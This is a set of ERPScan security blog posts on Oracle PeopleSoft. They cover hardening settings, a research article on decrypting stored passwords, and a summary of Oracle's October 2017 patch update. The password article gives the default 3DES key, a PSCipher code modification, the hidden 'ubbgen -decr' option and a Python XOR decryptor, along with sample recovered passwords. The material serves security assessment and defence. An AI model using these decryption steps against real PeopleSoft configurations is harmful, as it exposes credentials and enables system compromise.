The PSCipher utility provides Triple DES encryption (also 3DES) for increased data security. When you install Enterprise PeopleTools on your application servers and web servers, a default Triple DES encryption key is provided.

The version of the default encryption key is 1.1, or {V1.1}. If you generate a unique key, the current version used by the system would be {V1.2}. Each time you generate a new key, the system increments the current version number.

Threat

PeopleSoft is installed with default encryption key, which is known anyway. Even if the administrator changes all important passwords, but doesn’t change the encryption key, an attacker who has an encrypted password can decrypt it using the default encryption key.

Solution

The best practice is to update the encryption key:

1. Run the following command to create a new key in the key file:
   [PIA_HOME]\webserv\[DOMAIN]\PSCipher –buildkey (for Weblogic)
   [PIA_HOME]\webserv\[Node_Server]\[APPLICATION].ear PSCipher –buildkey (for Websphere)
2. Copy [PIA_HOME]\webserv\[DOMAIN]\psvault for Weblogic
   ([PIA_HOME]\webserv\[Node_Server]\[APPLICATION].ear\psvault for IBM WebSphere) to the equivalent location on all other web server hosts and to [PS_HOME]\secvault\psvault on all application servers in your system.
3. Modify the encrypted text fields in
   
   • configuration.properties file, located in:
     [PIA_HOME]\webserv\[DOMAIN]]\applications\peoplesoft\PORTAL\WEB-INF\psftdocs\site_name (for Weblogic)
     [PIA_HOME]\webserv\[Node_Server]\[APPLICATION].ear\PORTAL\WEB-INF\psftdocs\ps\ (for Websphere)
     The following encrypted text values in the configuration.properties file need to be updated:
     WebUserId=
     WebPassword=
   • gatewayUserProfile.xml and integrationGateway.properties files, located in
     [PIA_HOME]\webserv\[DOMAIN]]\applications\peoplesoft\PSIGW\WEB-INF (for Weblogic)
     [PIA_HOME]\webserv\[Node_Server]\[APPLICATION].ear\PSIGW\WEB-INF\ (for Websphere)
     In the gatewayUserProfile.xml file, update the following text value:
     {V1.1}GD9klUFw8760HVaqeT4pkg==
     Update the following text values stored in the integrationGateway.properties file:
     ig.isc.password=
     ig.isc.$NODENAME.password=
     ig.certificatePasswd=
     secureFileKeystorePasswd=
     ig.jms.JMSTargetConnector.JMSProvider.Password=
     ig.jms.Queue1.Password=
     ig.jms.Topic1.Password=
     ig.jms.Topic1.NodePassword=
   • wss.properties file located in
     [PIA_HOME]\webserv\[DOMAIN]]\applications\peoplesoft\PORTAL\WEB-INF\classes\ (for Weblogic)
     [PIA_HOME]\webserv\[Node_Server]\[APPLICATION].ear\PORTAL\WEB-INF\classes\ (for Websphere)
     [PIA_HOME]\webserv\[DOMAIN]]\applications\peoplesoft\pspc\WEB-INF\classes\ (for Weblogic)
     [PIA_HOME]\webserv\[Node_Server]\[APPLICATION].ear\pspc\WEB-INF\classes\ (for Websphere)
     [PIA_HOME]\webserv\[DOMAIN]]\applications\peoplesoft\PSIGW\WEB-INF\classes (for Weblogic)
     [PIA_HOME]\webserv\[Node_Server]\[APPLICATION].ear\PSIGW\WEB-INF\classes (for Websphere)
     Update the following text entry in the wss.properties file in all locations:
     org.apache.ws.security.crypto.merlin.keystore.password=

Web Profile Public Access Configuration [EASSEC-PVAG-PS-17]

Description

A Web Profile is a specific configuration of portal-related properties that control or affect the functionality of your PeopleTools portal. These predefined web profiles provide several configurations for use with your PeopleTools portal:

• DEV
  This web profile provides basic portal functionality for development, including trace and debug settings that are appropriate for development.
  Important! Never run your production system with the DEV web profile. This profile is for development environments and is not tuned for performance.
• TEST
  This web profile uses the same settings as the DEV web profile, except that fewer trace and debug properties are enabled.
• PROD
  This web profile uses the settings that are most commonly needed in a production environment that authenticates users.
• KIOSK
  This web profile uses the same settings as the PROD web profile, except that public user access is enabled for the Guest user, and all options for storing caching or persistent cookies on the browser are disabled.

Web Profile Security consists of Public Access settings.

Also a security-relevant parameter AuditPWD in Custom Properties page is essential. It turns on an access to the PeopleSoft Portal functions, that permits revealing a lot of information about the system configuration remotely (see EAS-SEC. Oracle PeopleSoft Security Configuration. Part 5: Open remote management interfaces).

Threat

If there is Public User, an attacker can conduct the TockenChpoken attack, which is a kind of privilege escalation attack. If a Public User has a special role, an attacker can perform a dangerous action in the system, as it does not require authorization.

Solution

Make sure that you do not use the DEV or TEST Web Profiles in the production systems.

The Best practice is not to use Public Access and Public Users.

Also, ensure that XML Link User ID and Public User ID don’t have a special role and critical actions.

To change Web Profile Settings, go to the tabs PeopleTools > Web Profile > Web Profile Configuration, choose the current Web Profile and go to the Security page.

It is highly recommended not to use auditPWD Custom Property for current Web Profile in productive systems. You can delete this property on Custom Properties page.

Web Profile SSL Configuration [EASSEC-PVAG-PS-18]

Description

In addition to the Public Access described in the previous section, a Web Profile allows configuring SSL settings. Selected Secured Access Only check box enforces SSL in case the entire website requires the SSL protocol. This prevents users from using a non-SSL protocol to access any link within this website or application. Selected Secure Cookie with SSL check box prevents the single signon token from traveling over an insecure network.

Some default values for delivered Web Profiles:

Threat

With business-to-business applications, where systems communicate with each other via the Internet, data must flow securely. If you don’t use the SSL protocol, an attacker can steal the transmitted critical information.

Solution

Make sure that you do not use the DEV or TEST Web Profile in production systems.

For current Web Profile configure Settings properly like in the following table:

As well it is recommended to set Delete Cookie on Logout, HttpOnly and Secure flags on Cookie Rules page.

Further steps

The number of various fine-tuned security settings is enormous, and there are specific ones for each particular PeopleSoft solution or module. Likewise the main portal and user accounts, auxiliary subsystems can be bruteforced, so their password configuration should be enabled as well.

Start with the document dubbed PeopleTools 8.55: Security Administration and System and Server Administration, then you can examine the documents on particular application security configuration in detail.

The post EAS-SEC. Oracle PeopleSoft Security Configuration. Part 6: Insecure settings appeared first on ERPScan.

The PeopleSoft Internet Architecture (PIA) is a multi-component system with a lot of cross-component interactions and numerous types of interactions between users and external systems. Therefore, various ways exist to attack the interaction channel.

In PIA that is shown below (see figure 1), the following connections are used:

• HTTP
• Jolt / Tuxedo
• RDBMS connections (SQL)

Each connection may be susceptible to man-in-the-middle (MITM) attacks. To secure links between elements of the system including browsers, web servers, application servers, and database servers, PeopleSoft software incorporates a combination of SSL/TLS security and BEA Tuxedo and BEA Jolt encryption.

Image may be NSFW.
Clik here to view.Figure 1 – PeopleSoft Internet Architecture

The SSL/TLS encryption to protect HTTP connections [EASSEC-PVAG-PS-19]

Description

By default, PeopleSoft is delivered with both HTTP and HTTPS access. It is well-known that HTTP has no protection, so all data between a user and PeopleSoft can easily be intercepted with a MITM attack.

The system uses SSL/TLS encryption in the following locations:

• between the browser and the web server;
• between the application server and the integration gateway;
• between the integration gateway and an external system.

Threat

Lack of encryption in the network connection may lead to the interception of transmitted data, thus to an unauthorized access. The HTTP protocol transmits all authentication data as a plain text, that allows intercepting it easily with a spoofing attack.

Solution

Best practice is to protect HTTP connections with SSL/TLS. To enable SSL/TLS on a web server for HTTPS, please refer to PeopleBooks for instructions on how to enable SSL/TLS on the web server.

WebLogic

Follow the instructions of Enterprise PeopleTools PeopleBook: System and Server Administration, Working with Oracle WebLogic, Defining SSL Certificates on WebLogic.

WebSphere

Follow the instructions of Enterprise PeopleTools PeopleBook: System and Server Administration, “Working with IBM WebSphere,” Setting Up SSL on WebSphere.

If an HTTP server is also deployed, follow the instructions found in Enterprise PeopleTools PeopleBook: System and Server Administration, “Working with IBM WebSphere,” Setting Up SSL on IBM HTTP Server.

How to disable HTTP on a web server

You can do this at multiple levels. Start by configuring the web profile:

1. In PIA, navigate to PeopleTools, Web Profile, Web Profile Configuration.
2. Select the web profile you want to configure (for example, PROD).
3. Select the Security page.
4. Select Secured Access Only.
5. Save your changes.

WebLogic

To further disable HTTP on a WebLogic server, first ensure that HTTPS is set up and works properly using the instructions in the previous section. Then do the following:

1. Log onto the WebLogic console.
2. Expand from the left panel PeopleSoft, Server, PIA.
3. On the right panel, select Configuration, General tab.
4. Deselect the Listen Port Enabled check box.
5. Select Apply.

WebSphere

To further disable HTTP on the WebSphere server, first ensure that HTTPS is set up and works properly using the instructions in the previous section.

In WebSphere, you can disable HTTP by converting an HTTP port into an HTTPS port, as follows:

1. Expand Servers, Application Server, server_name, Web Container, HTTP Transport.
2. Click the relevant HTTP port.
3. Select the Enable SSL check box.
4. Select the SSL drop-down that is tied to the certificates.
5. Save the configuration and log off.
6. Restart the WebSphere server.

Encryption usage for Jolt/Tuxedo connections protection [EASSEC-PVAG-PS-20]

Description

The system uses Oracle Tuxedo and Oracle Jolt encryption in the following locations:

• between the web server and the application server;
• between the integration gateway and a PeopleSoft system (Oracle Jolt only).

Jolt is used for interactions between the Web Server and the application server. Tuxedo is used when developers apply the 3-tier connection (from developers to an application server). Jolt/Tuxedo is not encrypted by default either, but encryption can be turned on.

Threat

As Jolt/Tuxedo is not encrypted by default, data is transmitted as a plain text. Data inside packets look like plain SQL queries and can contain users’ passwords. Thus all the data between the user and PeopleSoft can be easily intercepted with a MITM attack.

Solution

To enable Tuxedo-level encryption, edit the psappsrv.cfg configuration file for the domain. Change the Min Encryption property for the Workstation Listener and the JOLT Listener sections. The default value of 0 does not encrypt. Change the value to 64 for 64-bit encryption or to 128 for 128-bit encryption:

Image may be NSFW.
Clik here to view.
Figure 2 – psappsrv.cfg configuration file

Encryption usage for RDBMS connection protection [EASSEC-PVAG-PS-21]

Description

Requests from the application server and 2-tier connections from developers go directly to the RDBMS. Security between the application server or 2-tier connections and a database is supplied by RDBMS connectivity.

Threat

Lack of encryption in this segment also allows intercepting full control of the system. It is true for Microsoft SQL Server especially, where the connection password can be retrieved in a plain text.

Solution

Best practice is to use SSL/TLS from your application to encrypt a connection to a DB instance running MS SQL Server, Oracle or other. Each DB engine has its own process for implementing SSL/TLS. Also, it is recommended to use data network encryption and integrity to ensure that data is secure as it travels across the network. The step-by-step instructions are detailed in an appropriate Administrator’s Guide.

Further steps

This section contains the detailed encryption settings for various services. However, you should understand that even if the encryption is enabled, it is not always securely configured: there are various fine-tuned settings that protect against attacks for each encryption type and for a particular case. For example, the recent BEAST and CRIME attacks on the SSL determined the need for more SSL fine-tuned settings or use TLS. That is why you should configure the encryption very carefully, considering new attack types and specifics of the configured service.

The post EAS-SEC. Oracle PeopleSoft Security Configuration. Part 7: Unencrypted connections appeared first on ERPScan.

We continue to familiarize you with PeopleSoft security aspects and share the latest research directly from our lab, hot and tasty. The topic of today’s research is …

Passwords! Right, it’s a never-ending topic. I will describe how to decrypt PeopleSoft application-specific passwords for fun and profit.

Information provided in this article can cut both ways. From penetration testers’ point of view, it will bring knowledge that can help to gain access to PeopleSoft systems during security assessments. As for defense, this information will warn about hidden threats that potentially exist in PeopleSoft systems.

At the end of the article, I will make recommendations for PeopleSoft administrators to prevent these threats.

PeopleSoft passwords

We can divide these passwords mainly into 2 groups:
1) passwords generated by the PSCipher utility
2) passwords that we can discover in psappsrv.cfg file

Passwords produced by the PSCipher utility

According to Oracle, “The PSCipher feature encrypts and decrypts text used in your PeopleSoft system. System administrators interact with PSCipher through a Java, command line utility located on the web server, which enables you to encrypt text, such as user IDs and passwords, stored in configuration files.”

We can use this utility for encryption, but if we run it, we won’t find any arguments for password decryption.

$ ./PSCipher.sh
Usage: PCipher.sh <password>
  (to encrypt password)
or PSCipher -buildkey
  (to build a new key)

Java application is a utility by itself, so we can try decompiling it and find out how we can use it for password decryption.

For decompilation, I applied Procyon utility. After, we can see that the PSCipher utility is a simple program that has several methods and one of them is provided below.

public static String decodePassword(final String enpasswd) throws Exception {

Nevertheless, we don’t have access to this method from the program start point, a main function. Therefore, we can a little bit change the main function to use this method.

if (args.length == 2) {
      try {
          final String decode = decodePassword(args[1]);
          System.out.println("Decrypted password: " + decode);
            }
      catch (Exception e) {
          System.out.println("PSCipher failed. " + e.getMessage());
      }
  }  else {
    usage();
  }
  return;

If we append this code and recompile the PSCipher utility, we will be able to decrypt PSCipher’s passwords.

retset $ java -Dps_vault=./psvault PSCipher
Usage:
  PSCipher <ClearText>
  (to encrypt the clear text)
or
  PSCipher -BuildKey
  (to build a new key)
or
  PSCipher -decrypt
  (to decrypt a key)

retset $ java -Dps_vault=./psvault PSCipher PSCipher "@ret5et"
Encrypted text: {V1.1}AqtyaqNaKoU=
retset $ java -Dps_vault=./psvault PSCipher -decrypt {V1.1}AqtyaqNaKoU=
Decrypted password: @ret5et
# PSCipher's encryption algorithm.

The PSCipher utility uses triple DES algorithm to encrypt/decrypt user passwords. The secret key is stored in special storage that is called psvalut. You can also mention a prefix that is used in a password encrypted by the PSCipher. In our case, it is {V1.1}. These prefixes indicate that the version of psvault format is “V1”, the second part after the dot is the number of internal triple DES key for passwords decryption/encryption. For example, if we run the PSCipher with an option -BuildKey we will get a message:

A new key of version {V1.2} is generated successfully

If we run the utility again with the same option, we get {V1.3}, etc.

User data is encrypted on a new secret key, it is added to psvault, and older keys are not lost, and you can decrypt the old data with prefixes 1.1, 1.2.

retset $ java -Dps_vault=./psvault PSCipher "@ret5et"
Encrypted text: {V1.3}cfHORahgOlM=

It’s important for PeopleSoft administrators to understand that if they don’t add a new secret key to psvalut storage (- BuldKey option) after system installation, PeopleSoft system will use default 3DES secret key for all data that needs to be encrypted. A default key in psvault isn’t generated randomly after installation, and the prefix {1.1} indicates that the PeopleSoft system uses this default base64 encoded triple DES key.

T0qn4IaSDYoxTFflL0wcoaKXV6FDQ8Fr

We can easily check that our psvault storage contains this key using STRINGS, SED, and CUT commands on Unix-like operation systems.

retset $ strings -a psvault  | sed -e 's/^ //g;' | cut -c-32
T0qn4IaSDYoxTFflL0wcoaKXV6FDQ8Fr
FWS6Ygh8cNkThjcWyDH9Zw47gA1ATHYv
UuC6OPdDyP7yQKiGDk/NkUNkq7NP+OqM

In the output that is shown above, the first line is a default key for {V1.1} prefix, and the remaining keys generated randomly are used for prefixes {V1.2} and {V1.3} accordingly.

The predefined key for the prefix {V1.1} was used on the whole PeopleSoft installation with a PeopleTools version at least from 8.50 and further. It means if an attacker somehow exposed critical data from PeopleSoft inner configs, he or she can easily decrypt and obtain the original password. This decrypted password can be used to leverage an attacker’s access to critical parts of PeopleSoft system or even can compromise the system, in case an attacker got access to integrationGateway.properties config.

Another way of collecting passwords that have been encrypted with the default key is to use Google. As a rule, PeopleSoft administrators expose passwords by themselves. For example, we can find that these passwords are publicly accessible:

{V1.1}g3sOb5a44/RluB4AZlXHVw== ovmwelc0me
{V1.1}wOvkBkaVu6k= mary
{V1.1}7m4OtVwXFNyLc1j6pZG69Q== password

Passwords from psappsrv.cfg

This file contains critical credentials such as password from PS user, PeopleSoft Application Administrator.

If we try to find any information on how these passwords can be encrypted we will get stuck, at least the same happened to me.

I am only aware that PSADMIN utility can change passwords in psappsrv.cfg but how exactly, I don’t know.

PSADMIN utility is well known in PeopleSoft administrators, it is used to manage PeopleSoft systems.

Image may be NSFW.
Clik here to view.

We can change passwords manually in the menu that was shown above. Now we should understand how passwords are stored. We should answer 2 questions for that:

• Are they encrypted or hashed?
• Can we decrypt them if they are encrypted?

Finally, PSADMIN utility changes data in psappsrv.cfg configuration file, so if we look at passwords in this file we will see the following:

...
UserPswd=sC33X45qyMXPEbKTYHrJ06Fd31PfKYBdSEgL5e0i1vE=
ConnectPswd=gizrWPhLwsI5KYakWwvJDLtoEGNNNG4lFfq8W5x/NpM=
DomainConnectionPwd=iSTwU6g03N1UlzIng6I+fsXdd6L02b3iQrAW5AhSeOo=
..

At first glance, the passwords are hashed. Nevertheless, we can get all answers from the PSADMIN utility. For that, we will try collecting base information about the internal functionality of the utility. For that, we try to get names of all symbols used in the PSADMIN utility. We can do this with an assist of nm utility.

$ nm -C $(which psadmin)

The nm utility was used because Oracle doesn’t delete symbols from the PSADMIN tool.

We can try to find curious function names that work with passwords. We can do this in the following way:

$ nm -C $(which psadmin)   | grep -Ei pwd\|password\|paswd
                 U IsPassword
0000000000444430 T RetrieveDomainConnectionPwd(char*) #<- !!!
000000000068ee20 B g_szAppPassword
00000000008d1b00 B g_szPSPassword

It seems interesting because according to the function name, RetrieveDomainConnectionPwd, we can in theory retrieve passwords from psappsrv.cfg.

RetrieveDomainConnectionPwd

Now it is time for static analysis. We can try to grasp how this function works by using IDA Pro disassembler or another free analog, for example, radare2. After the function has been decompiled and slightly reverse-engineered, we can see these remarkable parts of it:

std::string::string(&command, "", &v39);
 std::string::string(&ubbgenFullPath, "", &v40);
 std::string::string(&appDomName, "", &v41);
 v8 = strlen(g_szPSHome);
 v9 = std::string::assign(&ubbgenFullPath, g_szPSHome, v8);
 std::string::append(v9, "/bin/ubbgen", 0xBuLL); //XXX ???
 sprintf(&s, "%d", 30LL, v29);
 v10 = std::string::assign(&appDomName, "-decr ", 6uLL);

and

ReportDebug("Calling UBBGEN with %s", command, v30);
 v26 = popen(command, "r");

It means that some utility is called with an option “-decr”, and it seems that its name is UBBGEN. Fast check in dynamic analyses has shown that it’s true. If we stop execution in _popen function and look at content of command variable, we will see the following:

Image may be NSFW.
Clik here to view.

The UBBGEN utility can read parameters from a file, there is a file content

$ cat /home/psadm2/psft/pt/8.55/tmp/KeyFile_15905.txt
-decr 0nerYZpHzNsPsrWhmH05MidkbfGiH+EFu4/zXPFq 30

Therefore, finally, this is how we can run command to decrypt DomainConnectionPwd:

$ ubbgen -decr iSTwU6g03N1UlzIng6I+fsXdd6L02b3iQrAW5AhSeOo= 30
jahce6queiXeevoo1quo0nano #decrtypted password

Moreover, if we remove ’30’ program, it will work correctly.

$ ubbgen -decr iSTwU6g03N1UlzIng6I+fsXdd6L02b3iQrAW5AhSeOo=
jahce6queiXeevoo1quo0nano #decrtypted password

The UBBGEN utility can decrypt more than one parameter from psappsrv.cfg (DomainConectionPwd), and even all of them.

In my test system, they look as follows:

$ ubbgen -decr sC33X45qyMXPEbKTYHrJ06Fd31PfKYBdSEgL5e0i1vE # UserPswd
ShooChemijo8XooVoo2thoh9i

$ ubbgen -decr gizrWPhLwsI5KYakWwvJDLtoEGNNNG4lFfq8W5x # ConnectPswd
aish5Iojeghoo8ThaiPhohfei

$ ubbgen -decr iSTwU6g03N1UlzIng6I+fsXdd6L02b3iQrAW5AhSeOo= # DomainConnectionPwd
jahce6queiXeevoo1quo0nano

Another compelling thing about UBBGEN that it has “-encr” option and we can encrypt what we need.

$ ubbgen -encr someString
kCr1VZ5238EDAWWJFGQm5bDCGm5sXg3GDPkIwUUv4gw=

The UBBGEN utility

I didn’t find any documentation that is relevant to this utility, but only related to Using PSADMIN Configuration Files.

According to it, “Regardless of how you specify domain values, ultimately you must run PSADMIN to generate some necessary files that include your specific values. In the following example, PSADMIN invokes another PeopleSoft executable, UBBGEN, which reads the values and format in the psappsrv.cfg, psappsrv.val, and psappsrv.ubx files, and generates the psappsrv.ubb and psappsrv.env files.

Where you see Do you want to change any config values? (y/n), regardless of what you enter, PSADMIN calls UBBGEN.

If you have already entered values manually in the psappsrv.cfg file and enter n, UBBGEN reads those values and writes to the necessary files.

If you enter y, you see the PSADMIN prompt interface, which is actually a wrapper to UBBGEN. UBBGEN reads the previous values in the psappsrv.cfg, presents those values, and allows you to change them. It presents the values in the format that is derived from reading the PSAPPSRV.UBX file, and it validates selected values based on criteria in the PSAPPSRV.VAL file.”

It implies that PSADMIN is only a wrapper for UBBGEN that does all main work behind the scene. If we run UBBGEN without any arguments, we will get its usage prompt.

$ ubbgen
Usage: ubbgen -t <ubx_file> -c <cfg_file> -o <ubb_file> -q(uiet) y/n [-i(mport) y/n] [-s "DBNAME/DBTYPE/OPRID/OPRPSWD/TESTSERV/ADD_TO_PATH/CONNECT_ID/CONNECT_PSWD/SERV_NAME/(NO)ENCRYPT" -p WSL_PORT/JOLT_PORT/JRAD_PORT]
[-u {PUBSUB}=y/n/{QUICKSRV}=y/n/{QUERYSRV}=y/n/{JOLT}=y/n/{JRAD}=y/n/{DBGSRV}=y/n/{RENSRV}=y/n/{MCF}=y/n/{PPM}=y/n/{ANALYTICSRV}=y/n]

It’s ironic that UBBGEN’s usage prompt doesn’t show “-decr” and “-encr” options, it seems they are hidden.

The UBBGEN decryption algoritm

This utility uses the same algorithm that was described in Alexey Tyurin’s article about the decryption of AccessID account. The code shown below is borrowed from there.

import base64, sys

def xor_strings(xs, ys):
 return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))

if len(sys.argv) < 2:
 sys.exit('Usage: %s b64_encoded_value_of_AccessID_or_AccessPSWD' % sys.argv[0])

key = "\xE3\x45\x98\x30\xCD\x02\xAD\xA8"

result = base64.b64decode(sys.argv[1])
if len(result) != 8:
 print "Wrong encrypted value legth"

result = xor_strings(result, key)
print "Decrypted value is:\t"+result

PeopleSoft Passwords Decryption Tips

Taking into consideration all the mentioned above, I can provide these recommendations:

• Never disclose your PeopleSoft configs even if you think that all its critical data is encrypted.
• Don’t use the encrypted values with {1.1} prefix, add a new key to psvault storage and reincrypt passwords there.
• Use difficult passwords for all services. Even for those that seem to be uncritical.

In this article, I have briefly reviewed how we can decrypt PeopleSoft’s application passwords, I showed why it’s important to add new keys to psvault and I hope you found this article useful.

The post PeopleSoft Passwords Decryption appeared first on ERPScan.

Today Oracle has released its quarterly patch update for October 2017. It fixes a total of 252 vulnerabilities.

The main highlights are as follows:

• Oracle closed 1119 issues in 2017 in total and the average number of security issues in 2017 is 22% more than in 2016.
• October’s CPU contains recording 155 vulnerabilities in Business-Critical Applications. It’s almost 62% of vulnerabilities found in other Oracle products.
• This patch update also contains a alarming number of PeopleSoft fixes totaling 23. However, not only the number, but the criticality of issues is alarming. 13 of them can be exploited over the network without entering user credentials. The most critical vulnerability with CVSS 9.8 identified by ERPScan researchers allows executing commands on the PeopleSoft server remotely.

Analysis of Oracle Critical Patch Update – October 2017

Below you can find an analysis of the vulnerabilities closed by this Critical Patch Update provided by ERPScan Research and Security Intelligence teams.

Comparing with the previous CPU for July 2017 that jumped over a 300-issue mark and became the largest ever, this month’s patch update addresses approximately 23% less security issues.

Image may be NSFW.
Clik here to view.

Nonetheless, Oracle fixes reach 1119 in 2017, and the graph provided below illustrates the increasing number of patches that were released by Oracle for each year.

Image may be NSFW.
Clik here to view.

Oracle vulnerabilities by Application type

The patch updates touch a wide range of products. The affected product families are listed below by the number of closed issues in descending order.

Image may be NSFW.
Clik here to view.

As you can see from the table, Oracle Fusion Middleware leads by the number of the closed issues.

Vulnerabilities in Oracle’s business-critical applications

The fact that Oracle has 110,000 applications customers from the wide range of industries, makes it of the utmost importance to apply the released security patches.

This quarter, CPU contains recording 155 patches (62%) for vulnerabilities affecting a scope of the Business applications from Oracle, namely, PeopleSoft, E-Business Suite, Fusion Middleware, Hospitality Applications, Retail, Hyperion, Siebel CRM, Supply Chain, JD Edwards etc. About 71% of them can be exploited remotely without entering credentials.

Oracle PeopleSoft Security

Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate different business critical information, depending on modules installed in an organization.

Image may be NSFW.
Clik here to view.

This quarter only, the vendor released 23 fixes addressing the component (~9% of the update). For comparison, there were 44 PeopleSoft patches in total for the last whole year.

Image may be NSFW.
Clik here to view.

13 of these security loopholes can be exploited over the network without requiring user credentials.

The highest CVSS score is 9.8.

Oracle E-Business Suite Security

Oracle E-Business Suite (EBS) is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate business-critical information, depending on modules installed in an organization.

This critical patch update contains 24 fixes for Oracle EBS. The highest CVSS score is 9.1.

Oracle vulnerabilities identified by ERPScan Research team

This quarter, 15 critical vulnerabilities discovered by ERPScan researchers were closed.

The details of the identified issues are provided below:

• Oracle Peoplesoft Anonymous RCE using PPMI (CVSS base score 9.8, CVE-2017-10366). With malicious JAVA serialized package attackers can execute system command on the remote server.
• Oracle Weblogic Application Server – Authorization bypass(CVSS base score 9.8, CVE-2017-10271). Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
• Oracle E-Business Suite Cross Site Scripting (ibeCZzpEntry.jsp) (CVSS base score 8.2, CVE-2017-10409). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (cskmrelstmts.jsp) (CVSS base score 8.2, CVE-2017-10410). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (cskmslctcat.jsp) (CVSS base score 8.2, CVE-2017-10411). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (cskmslctplat.jsp) (CVSS base score 8.2, CVE-2017-10412). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (csm5Sync.jsp) (CVSS base score 8.2, CVE-2017-10413). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (ibeCScdAgrmntDetail.jsp) (CVSS base score 8.2, CVE-2017-10414). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (ibutpqs.jsp) (CVSS base score 8.2, CVE-2017-10415). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (ieccaleassignexception.jsp) (CVSS base score 8.2, CVE-2017-10416). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Oracle E-Business Suite Cross Site Scripting (ieccaleexception.jsp) (CVSS base score 8.2, CVE-2017-10417). An anonymous user can exploit XSS attack in the context of E-Business Suite Application site against the application users. For example, he can steal cookies, or perform “session riding” attack.
• Hardcoded and predictable credentials for JMX InternalConnector and EMConnector (CVSS base score 7.5, CVE-2017-10373). An attacker gets extensive access to the diagnostic information of the PeopleSoft application. Including the ability to read the application server and a web server logs, get the status of server memory, etc.
• Stored XSS in HRMS (Applicant Notes page) (CVSS base score 5.4, CVE-2017-10304). An attacker can use special HTTP request for hijack session data for administrators or users of the web resource.
• Stored XSS in HRMS (Interview Calendar) (CVSS base score 4.6, CVE-2017-10306). An attacker can use special HTTP request for hijack session data for administrators or users of the web resource.
• Stored XSS in HRMS (Interview Calendar page) (CVSS base score 4.6, CVE-2017-10306). An attacker can use special HTTP request for hijack session data for administrators or users of the web resource.

The most critical Oracle vulnerabilities closed by CPU October 2017

Oracle prepares Risk Matrices and associated documentation describing the conditions that are required to exploit a vulnerability, and the potential impact of a successful attack. The severity of the vulnerabilities is calculated via the Common Vulnerability Scoring System (CVSS ). This aims to help Oracle customers to fix the most critical issues first.

The most critical issues closed by the CPU are as follows

• Oracle Hospitality Reporting and Analytics has CVE-2017-10402 (CVSS Base Score: 10.0) – Vulnerability in the Oracle Hospitality Reporting and Analytics component of Oracle Hospitality Applications (subcomponent: Report). Supported versions that are affected are 8.5.1 and 9.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Reporting and Analytics. While the vulnerability is in Oracle Hospitality Reporting and Analytics, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Reporting and Analytics.
• Oracle Hospitality Reporting and Analytics has CVE-2017-10405 (CVSS Base Score: 10.0) – Vulnerability in the Oracle Hospitality Reporting and Analytics component of Oracle Hospitality Applications (subcomponent: Report). Supported versions that are affected are 8.5.1 and 9.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Reporting and Analytics. While the vulnerability is in Oracle Hospitality Reporting and Analytics, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Reporting and Analytics accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Hospitality Reporting and Analytics./li>
• Siebel Apps – Field Service has CVE-2013-1903 (CVSS Base Score: 10.0) – vulnerability in the Siebel Apps – Field Service component of Oracle Siebel CRM (subcomponent: Smart Answer (Python)). Supported versions that are affected are 16.0 and 17.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Siebel Apps – Field Service. While the vulnerability is in Siebel Apps – Field Service, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Siebel Apps – Field Service.
• Oracle Hospitality Cruise AffairWhere has CVE-2017-10396 (CVSS Base Score: 9.9) – Vulnerability in the Oracle Hospitality Cruise AffairWhere component of Oracle Hospitality Applications (subcomponent: AffairWhere). Supported versions that are affected are 2.2.5.0, 2.2.6.0 and 2.2.7.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hospitality Cruise AffairWhere. While the vulnerability is in Oracle Hospitality Cruise AffairWhere, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hospitality Cruise AffairWhere accessible data as well as unauthorized read access to a subset of Oracle Hospitality Cruise AffairWhere accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Hospitality Cruise AffairWhere.
• Oracle Hospitality Reporting and Analytics has CVE-2017-10404 (CVSS Base Score: 9.9) – Vulnerability in the Oracle Hospitality Reporting and Analytics component of Oracle Hospitality Applications (subcomponent: iQuery). Supported versions that are affected are 8.5.1 and 9.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hospitality Reporting and Analytics. While the vulnerability is in Oracle Hospitality Reporting and Analytics, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Reporting and Analytics.
